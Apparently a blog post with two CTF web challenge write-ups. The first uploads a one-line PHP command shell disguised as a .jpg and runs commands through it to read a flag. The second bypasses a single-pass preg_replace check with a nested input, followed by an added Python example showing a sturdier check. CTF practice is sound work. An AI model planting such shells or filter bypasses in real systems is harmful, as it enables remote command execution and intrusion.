UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I do a quick test image upload to see how it works:

It uploaded the file and gave me a link to view it. When I click the link, it essentially prints the contents of the file as if it were text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

Now I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}

Vishwa CTF: Web: UwU (469)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the site, we are given this page:

After a little poking around, I look for a robots.txt entry:

Interesting! Now I follow the clue and look for a robots directory:

I click the link on the page for the source code and I get this:

After reviewing the code, I see that the PHP is looking for an input parameter “php_is_hard”, runs “preg_replace()” on it, and compares the output of that against a fixed string.

  if (isset($_GET['php_is_hard'])) {
      // user-controlled input
      $you_enter = $_GET['php_is_hard'];
      // the fixed string used both as the pattern to strip and as the expected result
      $we_enter = 'suzuki_harumiya';
      // single pass: remove every non-overlapping occurrence of $we_enter
      $the_final_one = preg_replace("/$we_enter/", '', $you_enter);
      // strict comparison of what is left against the same string
      if ($the_final_one === $we_enter) {
          open_up();
      }
  }

Analyzing this code, I see that it takes my input and looks for all instances of “suzuki_harumiya” and removes it. Then it compares the resulting string to “suzuki_harumiya”. If it is true, then it runs the “open_up()” function.

I see that I can simply manipulate my input to “ssuzuki_harumiyauzuki_harumiya” and the script will remove the single instance of “suzuki_harumiya” in it and the resulting string will, in fact, be “suzuki_harumiya”. When I feed that input, I get this:
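To show why the single-pass strip-then-compare is bypassable, and what a check that actually holds looks like, here is an added example (my own code, not the challenge's source) that models the PHP logic in Python with re.sub standing in for preg_replace; the strip_to_fixpoint, fixpoint_check and contains_token names are mine.

```python
import re

# The fixed string the challenge compares against (from the page).
TOKEN = "suzuki_harumiya"

# The bypass input shown in the write-up: the token with a second copy
# spliced in after its first character.
WRITEUP_PAYLOAD = "ssuzuki_harumiyauzuki_harumiya"


def weak_check(user_input: str) -> bool:
    """Model of the challenge's logic: one pass that removes every
    non-overlapping TOKEN, then a strict comparison of the remainder
    against TOKEN. Like preg_replace, re.sub scans left to right and does
    not rescan the text that a removal joins together."""
    remainder = re.sub(re.escape(TOKEN), "", user_input)
    return remainder == TOKEN


def strip_to_fixpoint(s: str) -> str:
    """Remove TOKEN repeatedly until a pass changes nothing, so the result
    provably contains no TOKEN no matter how copies were spliced."""
    while True:
        stripped = s.replace(TOKEN, "")
        if stripped == s:
            return s
        s = stripped


def fixpoint_check(user_input: str) -> bool:
    """Same comparison as weak_check, but on the fixpoint-stripped value.
    Any input containing TOKEN now reduces to a string without it, so the
    equality can no longer be satisfied by splicing copies together."""
    return strip_to_fixpoint(user_input) == TOKEN


def contains_token(user_input: str) -> bool:
    """If the goal is to deny the token, test for its presence instead of
    stripping it and trusting the leftover string."""
    return TOKEN in user_input


if __name__ == "__main__":
    print("weak check passes bypass:", weak_check(WRITEUP_PAYLOAD))
    print("fixpoint check passes bypass:", fixpoint_check(WRITEUP_PAYLOAD))
    print("payload still contains token:", contains_token(WRITEUP_PAYLOAD))
```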